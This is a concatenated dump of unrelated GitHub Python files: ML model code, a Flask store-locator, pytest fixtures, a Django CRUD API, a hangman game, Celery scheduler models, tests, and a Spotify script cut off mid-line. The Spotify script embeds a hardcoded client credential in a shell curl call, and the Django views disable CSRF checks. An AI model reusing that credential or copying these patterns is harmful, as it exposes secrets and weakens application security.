gridSearch.best_params_)\n\nparam_grid = {\n 'max_depth': [3, 4, 5, 6, 7, 8, 9, 10, 11, 12], \n 'min_impurity_decrease': [0, 0.001, 0.002, 0.003, 0.005, 0.006, 0.007, 0.008], \n 'min_samples_split': [14, 15, 16, 18, 20, ], \n}\ngridSearch = GridSearchCV(DecisionTreeRegressor(), param_grid, cv=5, n_jobs=-1)\ngridSearch.fit(train_X, train_y)\nprint('Improved parameters: ', gridSearch.best_params_)\n\nregTree = gridSearch.best_estimator_\n\n\nregressionSummary(train_y, regTree.predict(train_X))\nregressionSummary(valid_y, regTree.predict(valid_X))\n\n#plot reg tree\n\nplotDecisionTree(regTree, feature_names=train_X.columns)\nplotDecisionTree(regTree, feature_names=train_X.columns, rotate=True)\n\n\n# In[48]:\n\n\n#Classification Tree\nretail = pd.read_csv('retailsales1.csv')\n\npredictors = ['inventorygrowth', 'populationgrowth']\noutcome = 'yoygtenp'\n\nX = pd.get_dummies(retail[predictors], drop_first=True)\ny = retail[outcome]\n\ntrain_X, valid_X, train_y, valid_y = train_test_split(X, y, test_size=0.4, random_state=1)\n\nfullClassTree = DecisionTreeClassifier()\nfullClassTree.fit(train_X, train_y)\n\nplotDecisionTree(fullClassTree, feature_names=train_X.columns)#Confusion matrix on classification tree\n\nclassificationSummary(train_y, fullClassTree.predict(train_X))\nclassificationSummary(valid_y, fullClassTree.predict(valid_X))\n\n\n# Five-fold cross-validation of the full decision tree classifier\ntreeClassifier = DecisionTreeClassifier()\n\nscores = cross_val_score(treeClassifier, train_X, train_y, cv=5)\nprint('Accuracy scores of each fold: ', [f'{acc:.3f}' for acc in scores])\nprint(f'Accuracy: {scores.mean():.3f} (+/- {scores.std() * 2:.3f})')\nprint(f'Accuracy: {scores.mean():.3f} (+/- {scores.std():.3f})')\n\n\n# In[49]:\n\n\n#ensembles.\n\n#code for bagging and boosting trees\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nfrom pathlib import Path\n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import BaggingClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom dmba import classificationSummary\n\n\nretail = pd.read_csv('retailsales2.csv')\n\n\npredictors = ['inventorygrowthabovefive', 'populationgrowthabove']\noutcome = 'yoygtenp'\n\n\n# split into training and validation\n\nX = pd.get_dummies(retail[predictors], drop_first=True)\ny = retail[outcome]\n\n\nX_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=0.40, random_state=3)\n\n#singletree\n\ndefaultTree = DecisionTreeClassifier(random_state=1)\ndefaultTree.fit(X_train, y_train)\n\nclasses = defaultTree.classes_\nclassificationSummary(y_valid, defaultTree.predict(X_valid), class_names=defaultTree.classes_)\n\n\n#bagging\nbagging = BaggingClassifier(DecisionTreeClassifier(random_state=1), \n n_estimators=100, random_state=1)\nbagging.fit(X_train, y_train)\n\nclassificationSummary(y_valid, bagging.predict(X_valid), class_names=classes)\n\n\n#boosting\nboost = AdaBoostClassifier(DecisionTreeClassifier(random_state=1), n_estimators=100, random_state=1)\nboost.fit(X_train, y_train)\n\nclassificationSummary(y_valid, boost.predict(X_valid), class_names=classes)\n\n\n# In[51]:\n\n\n#Logistics regression\n\nfrom sklearn.linear_model import LogisticRegression, LogisticRegressionCV\nfrom sklearn.model_selection import train_test_split\nimport statsmodels.api as sm\nfrom mord import LogisticIT\nimport matplotlib.pylab as plt\nimport seaborn as sns\nfrom dmba import classificationSummary, gainsChart, liftChart\nfrom dmba.metric import AIC_score\n\n#code for fitting a logistic regression model\n\nretail = pd.read_csv('retailsales.csv')\nretail.head()\n\n# convert to categorical\nretail.inventorygrowthabovefive = retail.inventorygrowthabovefive.astype('category')\nretail.percapitagrowthabove = retail.percapitagrowthabove.astype('category')\n\n\npredictors = ['inventorygrowthabovefive', 'percapitagrowthabove']\noutcome = 'yoygtenp'\n\nX = pd.get_dummies(retail[predictors])\ny = (retail[outcome] == 'NO').astype(int)\nclasses = ['YES', 'NO']\n\n# partition data\ntrain_X, valid_X, train_y, valid_y = train_test_split(X, y, test_size=0.4, random_state=1)\n\n# fit a logistic regression (set penalty=l2 and C=1e42 to avoid regularization)\nlogit_reg = LogisticRegression(penalty=\"l2\", C=1e42, solver='liblinear')\nlogit_reg.fit(train_X, train_y)\n\nprint('intercept ', logit_reg.intercept_[0])\nprint(pd.DataFrame({'coeff': logit_reg.coef_[0]}, index=X.columns).transpose())\nprint()\nprint('AIC', AIC_score(valid_y, logit_reg.predict(valid_X), df = len(train_X.columns) + 1))\n\n\n#code for using logistic regression to generate predicted probabilities\n\nlogit_reg_pred = logit_reg.predict(valid_X)\nlogit_reg_proba = logit_reg.predict_proba(valid_X)\nlogit_result = pd.DataFrame({'actual': valid_y, \n 'p(0)': [p[0] for p in logit_reg_proba],\n 'p(1)': [p[1] for p in logit_reg_proba],\n 'predicted': logit_reg_pred })\n\n# display four different cases\ninterestingCases = [27, 93, 21, 70]\nprint(logit_result.loc[interestingCases])\n\n\n#confusion matrix\nclassificationSummary(train_y, logit_reg.predict(train_X))\nclassificationSummary(valid_y, logit_reg.predict(valid_X))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"arunfinacle/machine-learning-models","sub_path":"machinelearningallmodels.py","file_name":"machinelearningallmodels.py","file_ext":"py","file_size_in_byte":26435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1693548782","text":"from flask import Flask, render_template, request, jsonify\nfrom flask_assets import Bundle, Environment\nfrom smoothi_finder_fcns import*\nimport folium\nimport geocoder\nimport urllib.request\nimport json\n\napp = Flask(__name__)\n\n# Initialize Flask-Assets\nassets = Environment(app)\n\n# Define asset bundles\njs_bundle = Bundle(\n 'https://unpkg.com/leaflet@1.7.1/dist/leaflet.js',\n 'https://unpkg.com/leaflet.locatecontrol/dist/L.Control.Locate.min.js',\n 'https://cdnjs.cloudflare.com/ajax/libs/leaflet.markercluster/1.5.1/leaflet.markercluster.js'\n)\ncss_bundle = Bundle(\n 'https://unpkg.com/leaflet@1.7.1/dist/leaflet.css',\n 'https://unpkg.com/leaflet.locatecontrol/dist/L.Control.Locate.min.css',\n 'https://cdnjs.cloudflare.com/ajax/libs/leaflet.markercluster/1.5.1/MarkerCluster.css',\n 'https://cdnjs.cloudflare.com/ajax/libs/leaflet.markercluster/1.5.1/MarkerCluster.Default.css'\n)\n\n# Register asset bundles\nassets.register('js_all', js_bundle)\nassets.register('css_all', css_bundle)\n\napp.static_folder = 'static'\n\n# Read locations from files\ntropical_smoothie_locations = read_locations('TropicalLocations.txt')\ntropical_smoothie_locations_loc = [item + [\"Tropical Smoothie\"] for item in tropical_smoothie_locations]\njamba_locations = read_locations('Jamba_Locations.txt')\njamba_locations_loc = [item + [\"Jamba Juice\"] for item in jamba_locations]\nsmoothie_king_locations = read_locations('Smoothie_King_Locations.txt')\nsmoothie_king_locations_loc = [item + [\"Smoothie King\"] for item in smoothie_king_locations]\n\nall_locations = tropical_smoothie_locations_loc + jamba_locations_loc + smoothie_king_locations_loc\n\n# Count the number of locations\nnumber_of = len(tropical_smoothie_locations)\nnumber_of_jamba = len(jamba_locations)\nnumber_of_smoothie_king = len(smoothie_king_locations)\n\n# Extract smoothie locations\nsmoothie_locations = [coordinate[-2:] for coordinate in tropical_smoothie_locations]\nsmoothie_locations_jamba = [coordinate[-2:] for coordinate in jamba_locations]\nsmoothie_locations_smoothie_king = [coordinate[-2:] for coordinate in smoothie_king_locations]\n\napi_keys = load_api_keys('api.txt')\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n return render_template('index.html', input_coordinates = smoothie_locations, input_coordinates_jamba = smoothie_locations_jamba, input_coordinates_smoothie_king = smoothie_locations_smoothie_king, total_location = number_of, total_location_jamba = number_of_jamba, total_location_smoothie_king = number_of_smoothie_king)\n\n@app.route('/route_to', methods=['POST'])\ndef route_to():\n # Use Bing Maps to find a route\n bingMapsKey = api_keys[0]\n\n franchise = request.form['franchise']\n user_input= request.form['user_input']\n\n if franchise == 'Jamba Juice':\n route_settings = jamba_locations_loc\n elif franchise == 'Tropical Smoothie':\n route_settings = tropical_smoothie_locations_loc\n elif franchise == 'Smoothie King':\n route_settings = smoothie_king_locations_loc\n else:\n route_settings = all_locations\n \n lat = request.form['lat']\n lon = request.form['lon']\n \n #if there is no input default to [0,0]\n if lat == '' or lon =='':\n lat = 0\n lon = 0\n if user_input != '':\n lat,lon = get_coordinates(bingMapsKey, user_input)\n\n closest_location, distance = find_closest_location(['', '', '', lat, lon], route_settings)\n state_abbreviation, town_name, address, target_lat, target_lon, franchise_name = closest_location\n\n # Create a Folium map centered between the user's location and the closest location\n center_lat = (float(lat) + float(target_lat)) / 2\n center_lon = (float(lon) + float(target_lon)) / 2\n m = folium.Map(location=[center_lat, center_lon])\n\n routeUrl = f\"http://dev.virtualearth.net/REST/V1/Routes/Driving?wp.0={lat},{lon}&wp.1={target_lat},{target_lon}&routePathOutput=Points&key={bingMapsKey}\"\n try:\n response = urllib.request.urlopen(routeUrl)\n result = json.loads(response.read().decode(encoding=\"utf-8\"))\n\n resources = result[\"resourceSets\"][0][\"resources\"][0]\n itineraryItems = resources[\"routeLegs\"][0][\"itineraryItems\"]\n plotPoints = resources.get('routePath', {}).get('line', {}).get('coordinates')\n tripDistance = round(resources[\"travelDistance\"],2)\n traffic = resources[\"trafficCongestion\"]\n tripTime = resources[\"travelDuration\"]\n bbox = resources[\"bbox\"]\n # Convert trip time to hours and minutes\n trip_hours, remainder = divmod(tripTime, 3600)\n trip_minutes, _ = divmod(remainder, 60)\n\n #account for hour or hours\n if trip_hours == 1:\n Travel_Time = f\"{trip_hours} hour and {trip_minutes} minutes\"\n elif trip_hours == 0:\n Travel_Time = f\"{trip_minutes} minutes\"\n else:\n Travel_Time = f\"{trip_hours} hours and {trip_minutes} minutes\"\n \n # Append the directions to the list\n directions = [item[\"instruction\"][\"text\"] for item in itineraryItems]\n\n # Set the plot points\n coordinates = [(point[0], point[1]) for point in plotPoints] if plotPoints else []\n\n # Create a line connecting the points\n\n folium.PolyLine(locations=coordinates, color='green').add_to(m)\n except:\n tripDistance = \"No land route found\"\n traffic = \"N/A\"\n Travel_Time = \"N/A\"\n\n # Add the user's location marker\n folium.Marker(location=[float(lat), float(lon)], popup='User Location', icon=folium.Icon(color='blue')).add_to(m)\n\n # Add the closest location marker\n folium.Marker(location=[float(target_lat), float(target_lon)], popup=f'{town_name}, {state_abbreviation}, {address}', icon=folium.Icon(color='red')).add_to(m)\n\n # Add a line between the user's location and the closest location\n folium.PolyLine(locations=[[float(lat), float(lon)], [float(target_lat), float(target_lon)]], color='red').add_to(m)\n\n # Fit the bounds of the map to show both locations\n bounds = [[float(lat), float(lon)], [float(target_lat), float(target_lon)]]\n m.fit_bounds(bounds)\n\n # Add map key with distance and phrase\n map_key_html = \"\"\"\n
    \n

    Distance to {}

    \n

    Distance as the crow flies: {} km

    \n Driving Route Information:
    \n Distance: {} km
    \n Traffic Level: {}
    \n Travel Time: {}
    \n \n
    \n \"\"\".format(franchise_name,round(distance,2),tripDistance, traffic, Travel_Time)\n m.get_root().html.add_child(folium.Element(map_key_html))\n\n # Save the map as HTML\n route_map = m._repr_html_()\n return render_template('map.html', map_html=route_map, franchise=franchise)\n\n@app.route('/current_location')\ndef get_current_location():\n ip_addr = request.environ.get('HTTP_X_FORWARDED_FOR', request.remote_addr)\n g = geocoder.ip(ip_addr)\n if g.latlng:\n return jsonify({'lat': g.latlng[0], 'lon': g.latlng[1]})\n else:\n return jsonify({'error': 'Unable to retrieve current location'})\n\n\nif __name__ == '__main__':\n app.run(debug=False)","repo_name":"hbzxc/Smoothie_finder","sub_path":"flask_app/smoothie_finder.py","file_name":"smoothie_finder.py","file_ext":"py","file_size_in_byte":7310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43284088098","text":"import string\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\n\nimport pytest\nfrom dash.dependencies import Input, Output, State\nfrom dash_labs.grouping import make_grouping_by_index\nfrom dash_labs.plugins import FlexibleCallbacks\n\n# Helpers\nfrom dash_labs.templates.base import BaseTemplate\nfrom dash_labs.util import add_css_class, build_id\n\n\ndef all_component_props(component):\n return [prop for prop in component._prop_names if prop.isidentifier()]\n\n\ndef build_component_with_grouping(component_cls, int_grouping, size):\n component = component_cls()\n props = all_component_props(component)[5 : 5 + size]\n # set component property values\n for i, prop in enumerate(props):\n setattr(component, prop, i)\n # Build prop grouping\n prop_grouping = make_grouping_by_index(int_grouping, props)\n return component, prop_grouping, int_grouping\n\n\n@pytest.fixture\ndef scalar_grouping_size(request):\n return 0, 1\n\n\n@pytest.fixture(params=list(range(0, 5)))\ndef tuple_grouping_size(request):\n n = request.param\n return tuple(range(n)), n\n\n\n@pytest.fixture(params=list(range(0, 5)))\ndef dict_grouping_size(request):\n n = request.param\n return {string.ascii_uppercase[i]: i for i in range(n)}, n\n\n\n@pytest.fixture(params=list(range(0, 5)))\ndef mixed_grouping_size(request):\n case = request.param\n if case == 0:\n # tuple of tuples\n grouping = ((0, 1), 2)\n grouping_size = 3\n elif case == 1:\n # Deeply nested tuple of tuples\n grouping = (0, (1, (2, 3), ()), (), (4, ((5, (6, (7, 8))), 9)))\n grouping_size = 10\n elif case == 2:\n # dict of tuples\n grouping = {\"A\": (0, 1), \"B\": 2}\n grouping_size = 3\n elif case == 3:\n # dict of dicts\n grouping = dict(\n k0=0,\n k6=dict(k1=1, k2=dict(k3=2, k4=3), k5=()),\n k7=(),\n k13=dict(k8=4, k9=dict(k10=dict(k11=5), k12=6)),\n )\n grouping_size = 7\n else:\n # tuple of mixed\n grouping = (\n dict(\n k0=0,\n k6=dict(k1=1, k2=dict(k3=2, k4=3), k5=()),\n k7=(),\n k13=dict(k8=4, k9=(5, 6), k12=()),\n ),\n 7,\n ((8, dict(k13=(9, 10, 11), k14=dict(k15=12))), ()),\n )\n grouping_size = 13\n\n return grouping, grouping_size\n\n\n@pytest.fixture(params=[html.Button, dcc.Input])\ndef component_cls(request):\n return request.param\n\n\n@pytest.fixture\ndef component_str_prop(component_cls, scalar_grouping_size):\n int_grouping, size = scalar_grouping_size\n component, prop_grouping, value = build_component_with_grouping(\n component_cls, int_grouping, size\n )\n return component, prop_grouping, value\n\n\n@pytest.fixture\ndef component_tuple_prop(component_cls, tuple_grouping_size):\n int_grouping, size = tuple_grouping_size\n component, prop_grouping, value = build_component_with_grouping(\n component_cls, int_grouping, size\n )\n return component, prop_grouping, value\n\n\n@pytest.fixture\ndef component_dict_prop(component_cls, dict_grouping_size):\n int_grouping, size = dict_grouping_size\n component, prop_grouping, value = build_component_with_grouping(\n component_cls, int_grouping, size\n )\n return component, prop_grouping, value\n\n\n@pytest.fixture\ndef component_mixed_prop(component_cls, mixed_grouping_size):\n int_grouping, size = mixed_grouping_size\n component, prop_grouping, value = build_component_with_grouping(\n component_cls, int_grouping, size\n )\n return component, prop_grouping, value\n\n\n@pytest.fixture(params=[Input, Output, State])\ndef dependency(request):\n return request.param\n\n\n@pytest.fixture\ndef app():\n return dash.Dash(plugins=[FlexibleCallbacks()])\n\n\nclass ExampleTemplate(BaseTemplate):\n _valid_roles = (\"input\", \"output\", \"custom\")\n\n _inline_css = \"\"\"\n .test-css-class {\n padding: 0px;\n }\\n\"\"\"\n\n @classmethod\n def build_labeled_component(cls, component, label, label_id=None, role=None):\n # Subclass could use bootstrap or ddk\n if not label_id:\n label_id = build_id(\"label\")\n label_component = html.Label(id=label_id, children=label)\n container = html.Div(id=\"container\", children=[label_component, component])\n return container, \"children\", label_component, \"children\"\n\n @classmethod\n def build_containered_component(cls, component, role=None):\n \"\"\"\n Alternative to bulid_labeled_component for use without label, but for\n Unitform spacing with it\n \"\"\"\n container = html.Div(id=\"container\", children=component)\n return container, \"children\"\n\n def _perform_layout(self):\n return html.Div(\n id=\"all-div\",\n children=[\n html.Div(id=\"inputs-div\", children=self.get_containers(\"input\")),\n html.Div(id=\"outputs-div\", children=self.get_containers(\"output\")),\n html.Div(id=\"customs-div\", children=self.get_containers(\"custom\")),\n ],\n )\n\n @classmethod\n def _wrap_full_layout(cls, layout):\n return html.Div(id=\"app-div\", children=[layout])\n\n def _configure_app(self, app):\n super()._configure_app(app)\n add_stylesheet = True\n for url in app.config.external_stylesheets:\n if \"test_stylesheet\" in url:\n add_stylesheet = False\n break\n\n if add_stylesheet:\n app.config.external_stylesheets.append(\"http://test_stylesheet.css\")\n\n\n@pytest.fixture\ndef test_template():\n return ExampleTemplate()\n","repo_name":"patilanup246/dash-labs","sub_path":"tests/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":5667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"28274928943","text":"# Same as finding start point of cycle in a linkedlist. Use fp, sp. They will intersect at one point. Start another pointer at beginning and let it intersect sp.\n\nclass Solution(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n \n sp, fp = nums[0], nums[0]\n\n sp = nums[sp]\n fp = nums[fp]\n fp = nums[fp]\n \n while sp!=fp:\n sp = nums[sp]\n \n fp = nums[fp]\n fp = nums[fp]\n \n a = nums[0]\n b = sp\n \n while a!=b:\n a = nums[a]\n b = nums[b]\n return a","repo_name":"rohitpatwa/leetcode","sub_path":"287. Find the Duplicate Number.py","file_name":"287. Find the Duplicate Number.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"28508469463","text":"from django.http import JsonResponse\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import Company\nimport json\n\n\n# Create your views here.\n\nclass CompanyView(View):\n\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def get(self, request, id=0): #Se deja predeterm. en 0 para que las entregue todas en dado caso de que no se especifique un id (y se va al else), pero si le decimos un id específico, entonces entra al if y nos lo filtra.\n if (id>0):\n companies = list(Company.objects.filter(id=id).values())\n if len(companies) > 0: #...si existe ese id que buscamos entonces:\n company = companies[0] # porque aquí ya sabemos del if externo que obtendremos solo una compañía, y esa única estará filtrada en la list en la posición cero.\n datos = {'message': 'Success', 'company': company}\n else:\n datos = {'message': 'Company not found...'}\n return JsonResponse(datos)\n else:\n companies = list(Company.objects.values()) #Aquí serializamos a JSON el tipo QuerySet\n if len(companies) > 0:\n datos = {'message':'Success', 'companies': companies}\n else:\n datos = {'message': 'Companies not found...'}\n return JsonResponse(datos)\n def post(self, request):\n # print(request.body)\n jd = json.loads(request.body)\n # print(jd)\n Company.objects.create(name=jd['name'], website=jd['website'], foundation=jd['foundation'])\n datos={'message':'Success'}\n return JsonResponse(datos)\n def put(self, request, id): #porque necesitaremos el id de la compañía a modificar\n jd = json.loads(request.body)\n companies = list(Company.objects.filter(id=id).values())\n if len(companies) > 0:\n company = Company.objects.get(id=id) #esta vez si tengo la certeza de encontrarlo get devuelve un error si no lo encuentra, filter no devuelve errores.\n company.name=jd['name']\n company.website=jd['website']\n company.foundation=jd['foundation']\n company.save()\n datos={'message':'Success'}\n else:\n datos = {'message': 'Companies not found...'}\n return JsonResponse(datos)\n def delete(self, request, id):\n companies = list(Company.objects.filter(id=id).values())\n if len(companies) > 0:\n Company.objects.filter(id=id).delete()\n datos = {'message': 'Success'}\n else:\n datos = {'message': 'Company not found...'}\n return JsonResponse(datos)","repo_name":"JairoChoconta/django_project_2","sub_path":"Proyecto_API/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43124805038","text":"import os\nimport random\nfrom hangman_art import STAGES, LOGO\nfrom hangman_words import word_list\n\n# Game setup\nchosen_word = random.choice(word_list)\nword_length = len(chosen_word)\nend_of_game = False\nlives = 6\n\n# Game start\nprint(LOGO)\n\n# Testing code\n#  print(f'Pssst, the solution is {chosen_word}.')\n\n# Create blanks\ndisplay = []\nfor _ in range(word_length):\n display += \"_\"\n\n#  Ongoing game\nwhile not end_of_game:\n guess = input(\"Guess a letter: \").lower()\n\n #  Clear console to give a better UX\n os.system('clear')\n\n #  Check if the guess was already guessed before\n if guess in display:\n print(f\"You've already guessed {guess}\")\n else:\n # Guess not guessed before,\n # Update display in case the letter exists\n for position in range(word_length):\n letter = chosen_word[position]\n if letter == guess:\n display[position] = letter\n\n # If the user is wrong, lose a life and check if he lost all lives\n if guess not in chosen_word:\n print(\n f\"You guessed {guess}, that's not in the word. You lose a life.\")\n lives -= 1\n if lives == 0:\n end_of_game = True\n print(\n f\"You lose... the word you wanted to find is {chosen_word}\")\n\n print(f\"{' '.join(display)}\")\n\n # Check if user has got all letters.\n if \"_\" not in display:\n end_of_game = True\n print(\"You win.\")\n\n print(STAGES[lives])\n","repo_name":"Maycas/100-days-Python-2022","sub_path":"Day 07 - The hangman game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5758006973","text":"from datetime import datetime, timedelta\n\nfrom mongoengine import *\nfrom celery import current_app\nimport celery.schedules\n\n\ndef get_periodic_task_collection():\n if hasattr(current_app.conf, \"mongodb_scheduler_collection\"):\n return current_app.conf.get(\"mongodb_scheduler_collection\")\n elif hasattr(current_app.conf, \"CELERY_MONGODB_SCHEDULER_COLLECTION\"):\n return current_app.conf.CELERY_MONGODB_SCHEDULER_COLLECTION\n return \"schedules\"\n\n\n#: Authorized values for PeriodicTask.Interval.period\nPERIODS = ('days', 'hours', 'minutes', 'seconds', 'microseconds')\n\n\nclass PeriodicTask(DynamicDocument):\n \"\"\"MongoDB model that represents a periodic task\"\"\"\n\n meta = {'collection': get_periodic_task_collection(),\n 'allow_inheritance': True}\n\n class Interval(EmbeddedDocument):\n \"\"\"Schedule executing on a regular interval.\n\n Example: execute every 4 days\n every=4, period=\"days\"\n \"\"\"\n every = IntField(min_value=0, default=0, required=True)\n period = StringField(choices=PERIODS)\n\n meta = {'allow_inheritance': True}\n\n @property\n def schedule(self):\n return celery.schedules.schedule(timedelta(**{self.period: self.every}))\n\n @property\n def period_singular(self):\n return self.period[:-1]\n\n def __unicode__(self):\n if self.every == 1:\n return 'every {0.period_singular}'.format(self)\n return 'every {0.every} {0.period}'.format(self)\n\n class Crontab(EmbeddedDocument):\n \"\"\"Crontab-like schedule.\n\n Example: Run every hour at 0 minutes for days of month 10-15\n minute=\"0\", hour=\"*\", day_of_week=\"*\", day_of_month=\"10-15\", month_of_year=\"*\"\n \"\"\"\n minute = StringField(default='*', required=True)\n hour = StringField(default='*', required=True)\n day_of_week = StringField(default='*', required=True)\n day_of_month = StringField(default='*', required=True)\n month_of_year = StringField(default='*', required=True)\n\n meta = {'allow_inheritance': True}\n\n @property\n def schedule(self):\n return celery.schedules.crontab(minute=self.minute,\n hour=self.hour,\n day_of_week=self.day_of_week,\n day_of_month=self.day_of_month,\n month_of_year=self.month_of_year)\n\n def __unicode__(self):\n rfield = lambda f: f and str(f).replace(' ', '') or '*'\n return '{0} {1} {2} {3} {4} (m/h/d/dM/MY)'.format(\n rfield(self.minute), rfield(self.hour), rfield(self.day_of_week),\n rfield(self.day_of_month), rfield(self.month_of_year),\n )\n\n name = StringField(unique=True)\n task = StringField(required=True)\n\n interval = EmbeddedDocumentField(Interval)\n crontab = EmbeddedDocumentField(Crontab)\n\n args = ListField()\n kwargs = DictField()\n\n queue = StringField()\n exchange = StringField()\n routing_key = StringField()\n soft_time_limit = IntField()\n\n expires = DateTimeField()\n start_after = DateTimeField()\n enabled = BooleanField(default=True)\n\n last_run_at = DateTimeField()\n\n total_run_count = IntField(min_value=0, default=0)\n max_run_count = IntField(min_value=0, default=0)\n\n date_changed = DateTimeField()\n date_creation = DateTimeField()\n description = StringField()\n\n run_immediately = BooleanField()\n no_changes = False\n\n def save(self, force_insert=False, validate=True, clean=True,\n write_concern=None, cascade=None, cascade_kwargs=None,\n _refs=None, save_condition=None, signal_kwargs=None, **kwargs):\n if not self.date_creation:\n self.date_creation = datetime.now()\n self.date_changed = datetime.now()\n super(PeriodicTask, self).save(force_insert, validate, clean,\n write_concern, cascade, cascade_kwargs, _refs,\n save_condition, signal_kwargs, **kwargs)\n\n def clean(self):\n \"\"\"validation by mongoengine to ensure that you only have\n an interval or crontab schedule, but not both simultaneously\"\"\"\n if self.interval and self.crontab:\n msg = 'Cannot define both interval and crontab schedule.'\n raise ValidationError(msg)\n if not (self.interval or self.crontab):\n msg = 'Must defined either interval or crontab schedule.'\n raise ValidationError(msg)\n\n @property\n def schedule(self):\n if self.interval:\n return self.interval.schedule\n elif self.crontab:\n return self.crontab.schedule\n else:\n raise Exception(\"must define interval or crontab schedule\")\n\n def __unicode__(self):\n fmt = '{0.name}: {{no schedule}}'\n if self.interval:\n fmt = '{0.name}: {0.interval}'\n elif self.crontab:\n fmt = '{0.name}: {0.crontab}'\n else:\n raise Exception(\"must define interval or crontab schedule\")\n return fmt.format(self)\n","repo_name":"zmap/celerybeat-mongo","sub_path":"celerybeatmongo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5186,"program_lang":"python","lang":"en","doc_type":"code","stars":120,"dataset":"github-code","pt":"16"} +{"seq_id":"45227820141","text":"from django.urls import path\nfrom .views import *\nurlpatterns = [\n path('', index,name='home'),\n path('resume/', resume,name='resume'),\n path('about/', about,name='about'),\n path('blog/', blog,name='blog'),\n path('blog/', show_blog,name='blog_name'),\n path('contacts/', contacts,name='contacts')\n]\n","repo_name":"capzzet/infress","sub_path":"resume/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29831868664","text":"from src import messenger\nfrom unittest.mock import patch, ANY, MagicMock\nimport json\n\n@patch(\"stock.Stock\")\ndef test_connect(mock_stock):\n obj = messenger.Messenger()\n\n with patch.object(obj, 'mqttConnection') as mock_connect:\n obj.connect()\n mock_connect.connect.assert_called_with(\"localhost\",1883,60)\n\n@patch(\"stock.Stock\")\ndef test_disconnect(mock_stock):\n obj = messenger.Messenger()\n\n with patch.object(obj, 'connected', True), patch.object(obj, 'mqttConnection') as mock_connect:\n obj.disconnect()\n mock_connect.disconnect.assert_called()\n\n@patch(\"stock.Stock\")\ndef test_foreverLoop(mock_stock):\n obj = messenger.Messenger()\n\n with patch.object(obj, 'mqttConnection') as mock_connect:\n obj.foreverLoop()\n mock_connect.loop_forever.assert_called()\n\n@patch(\"stock.Stock\")\ndef test_onMQTTconnect(mock_stock):\n obj = messenger.Messenger()\n\n mock_client = MagicMock()\n\n obj._Messenger__onMQTTconnect(mock_client,None,None,None)\n\n mock_client.subscribe.assert_called_with([('req/price', 0)])\n\n\n@patch(\"stock.Stock\")\ndef test_onMQTTMessage(mock_stock):\n obj = messenger.Messenger()\n\n obj._Messenger__onMQTTMessage(MagicMock(),None,None)\n\nclass DummyMSG:\n def __init__(self):\n self.payload = \"Test\"\n\n def set_payload(self,data):\n self.payload = str.encode(data)\n\n@patch(\"stock.Stock\")\ndef test_mailMQTTRideTimecallback(mock_stock):\n obj = messenger.Messenger()\n\n responseData = DummyMSG()\n\n msgData = {\n \"symbol\":\"aapl\"\n }\n\n responseData.set_payload(json.dumps(msgData))\n\n with patch.object(obj, 'stockService') as mockStock, patch.object(obj,'mqttConnection') as mockConnection:\n mockStock.getStockPrice.return_value = {'symbol':'aapl','current':0.0,'highestDay':0.0,'lowestDay':0.0,'timestamp':0}\n obj._Messenger__mailMQTTPricecallback(None,None,responseData)\n mockStock.getStockPrice.assert_called_with(\"aapl\")\n mockConnection.publish.assert_called_with(\"price/current\",json.dumps({'symbol':'aapl','current':0.0,'highestDay':0.0,'lowestDay':0.0,'timestamp':0}))","repo_name":"pda-aswe/servicepreis","sub_path":"tests/test_messenger.py","file_name":"test_messenger.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43045608651","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nAplicações Distribuídas - Projeto 4 - spotify.py\nGrupo: 13\nNúmeros de aluno: 51595 - Diogo Frazão,\n 51628 - Tiago Robalo,\n 51636 - Vasco Bento\n\"\"\"\n#Zona para fazer imports\n\nimport requests\nimport json\nimport os\nimport ast\n\nget_at = 'curl -X \"POST\" -H \"Authorization: Basic OWRmNzQzY2E5ZDNkNDc1NmEyNTQwMWI4Y2EzYjMwMjc6NDNmNjQ3ZTA5ZmZjNDg3NzgwZjBiZDVhMGNmOThkN2I=\" -d grant_type=client_credentials https://accounts.spotify.com/api/token'\naccess_token = ast.literal_eval(os.popen(get_at).read())\n\n#Programa principal\n\ndef show_banda(banda):\n url = \"https://api.spotify.com/v1/search?q=\" + str(banda) + \"&type=artist&market=us&limit=1\"\n try:\n r = json.loads(requests.get(url, access_token).content.decode('utf-8'))\n name = r['artists']['items'][0]['name']\n genre = r['artists']['items'][0]['genres']\n followers = r['artists']['items'][0]['followers']['total']\n popularity = r['artists']['items'][0]['popularity']\n return [name, genre, followers, popularity]\n except:\n return [\"Token Inválido\"]\n\n\ndef show_album(album):\n url = \"https://api.spotify.com/v1/search?q=\" + str(album) + 